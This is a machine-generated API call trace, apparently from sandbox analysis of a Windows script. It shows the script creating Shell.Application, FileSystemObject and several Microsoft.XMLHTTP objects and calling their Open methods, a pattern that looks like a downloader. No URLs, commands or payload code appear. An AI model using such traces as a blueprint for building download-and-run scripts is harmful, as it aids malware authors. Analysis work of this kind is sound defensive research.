	[0264.956] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0264.956] SysStringLen (param_1=0x0) returned 0x0
	[0264.956] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0264.957] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0264.957] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0264.957] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0264.957] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0264.957] ??2@YAPEAX_K@Z () returned 0x62f350
	[0264.957] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0264.957] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0264.957] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0264.957] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0264.957] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0264.957] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0264.957] SysStringLen (param_1=0x0) returned 0x0
	[0264.957] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0264.959] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0264.959] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0264.959] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0264.959] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0264.959] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0264.959] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0265.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0265.720] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0265.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0265.721] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0265.722] SysStringLen (param_1=0x0) returned 0x0
	[0265.722] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0265.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0265.722] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0265.722] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0265.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0265.722] ??2@YAPEAX_K@Z () returned 0x62f330
	[0265.722] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f330) 
	[0265.722] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0265.722] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0265.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0265.722] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0265.722] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0265.722] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0265.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0265.724] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0265.724] SysStringLen (param_1=0x0) returned 0x0
	[0265.724] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0265.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0265.725] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0265.725] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0265.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0265.725] ??2@YAPEAX_K@Z () returned 0x62f310
	[0265.725] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0265.725] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0265.725] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0265.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0265.725] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0265.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0265.725] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0265.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0265.725] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0265.725] SysStringLen (param_1=0x0) returned 0x0
	[0265.725] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0265.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0265.726] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0265.726] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0265.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0265.726] ??2@YAPEAX_K@Z () returned 0x62f330
	[0265.726] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0265.726] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0265.726] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0265.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0265.726] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0265.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0265.726] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0265.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0265.726] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0265.726] SysStringLen (param_1=0x0) returned 0x0
	[0265.726] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0265.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0265.726] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c10) returned 0x0
	[0265.726] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0265.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74d8) returned 0x0
	[0265.727] ??2@YAPEAX_K@Z () returned 0x62f310
	[0265.727] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74d8, pUnkSite=0x62f310) 
	[0265.727] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0265.727] XMLHTTPRequest:IUnknown:Release (This=0x49c74d8) returned 0x0
	[0265.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c10) returned 0x0
	[0265.727] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c10) returned 0x3
	[0265.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0265.727] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0265.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0265.727] longjmp () 
	[0265.727] longjmp () 
	[0265.727] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0265.727] SysStringLen (param_1=0x0) returned 0x0
	[0265.727] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0265.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0265.727] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0265.727] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0265.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0265.727] ??2@YAPEAX_K@Z () returned 0x62f330
	[0265.728] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0265.728] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0265.728] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0265.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0265.728] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0265.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
